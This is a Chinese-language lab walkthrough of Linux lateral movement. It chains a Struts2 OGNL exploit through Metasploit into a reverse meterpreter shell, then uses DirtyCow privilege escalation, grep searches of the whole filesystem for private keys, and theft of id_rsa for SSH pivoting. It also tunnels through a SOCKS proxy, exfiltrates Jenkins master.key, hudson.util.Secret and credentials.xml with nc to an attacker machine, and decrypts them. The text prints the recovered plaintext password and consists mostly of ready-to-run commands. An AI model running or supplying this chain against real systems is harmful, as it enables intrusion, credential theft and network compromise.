【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全
文章目录
- 章节点
-
- linux靶场搭建
- 横向移动-Linux靶场-SSH协议&RSA密匙凭证
- 横向移动-Linux靶场-提权&SSH&密匙&Jenkins等
-
- 1、Web DMZ权限获取
- 2、Jenkins DMZ权限获取
- 3、Database DMZ权限获取
章节点
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH,Exchange,LLMNR投毒,NTLM-Relay,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。
linux靶场搭建
横向移动-Linux靶场-SSH协议&RSA密匙凭证
~/.ssh/config
~/.ssh/known_hosts
~/.bash_history
一般情况下SSH密钥存放在~/.ssh/目录下,也可以文件中搜索已保存的SSH凭证
grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*
grep -ir "BEGIN OPENSSH PRIVATE KEY" /*
参考:https://www.runoob.com/w3cnote/set-ssh-login-key.html
横向移动-Linux靶场-提权&SSH&密匙&Jenkins等
kali同局域网只能通讯web(172.16.250.10)
1、Web DMZ权限获取
信息收集:
nmap 172.16.250.0/24
172.16.250.10 80开放
/struts2-showcase
利用漏洞:
msfconsole
use exploit/multi/http/struts2_content_type_ognl
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 172.16.250.10
set lport 80
run
权限提升:
curl https://raw.githubusercontent.com/sqlnetcat/dirtycow-mem/master/dirtycow-mem.c
upload /root/dirtycow-mem.c /tmp
shell
gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
python3 -c "import pty;pty.spawn('/bin/bash')" #转化为有交互式的tty窗口
./dirtycow-mem
持续稳定:
echo 0 > /proc/sys/vm/dirty_writeback_centisecs #将写回脏页面的间隔时间设置为0秒。这意味着如果有脏页面需要写回,内核会立即进行写回操作,而不等待指定的时间间隔。
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn #将Linux内核的系统崩溃(panic)功能打开,并启用不同类型的崩溃触发器。这样,在出现严重问题时,内核会自动崩溃并停止系统运行。这有助于避免数据损坏和其他可能的问题。
横向移动:
cat /opt/tomcat/webapps/kittens/WEB-INF/config/opencms.properties #查看数据库配置文件 站库分离模式
查看历史命令获取到一些信息
尝试访问
cat ~/.bash_history
cp ~/.ssh/id_rsa /tmp/id_rsa
chmod 777 id_rsa
download /tmp/id_rsa /root/id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]
2、Jenkins DMZ权限获取
信息收集:
getuid
netstat -anpt
172.16.250.30 8080开放
建立节点:
use auxiliary/server/socks_proxy
vim /etc/proxychains4.conf
注意这里:
dynamic_chain:下方代理节点有一条测试正确也可以使用
strict_chain:如果下方设置了多个节点,必须都测试正确才可以使用
172.16.250.30 8080开放 jenkins服务
proxychains firefox
攻击Jenkins:
利用nc将文件反向传递,如果想通过30让50上线的话,需要将流量进行封装成ssh通道,因为10可以访问30的22端口
nc -lvp 1234 > master.key
nc -lvp 1234 > hudson.util.Secret
nc -lvp 1234 > credentials.xml
nc 172.16.250.128 1234 < /home/jenkins/secrets/hudson.util.Secret
nc 172.16.250.128 1234 < /home/jenkins/secrets/master.key
nc 172.16.250.128 1234 < /home/jenkins/credentials.xml
破解密匙:
https://github.com/cheetz/jenkins-decrypt
python decrypt.py master.key hudson.util.Secret credentials.xml
注意这里需要python3低版本才能正常解密使用
成功解密后密码为:)uDvra{4UL^;r?*h
利用30上面的jenkins服务的密码密钥进行横向移动
3、Database DMZ权限获取
密码横向:
ssh [email protected]
)uDvra{4UL^;r?*h
权限提升:
getuid
sudo su
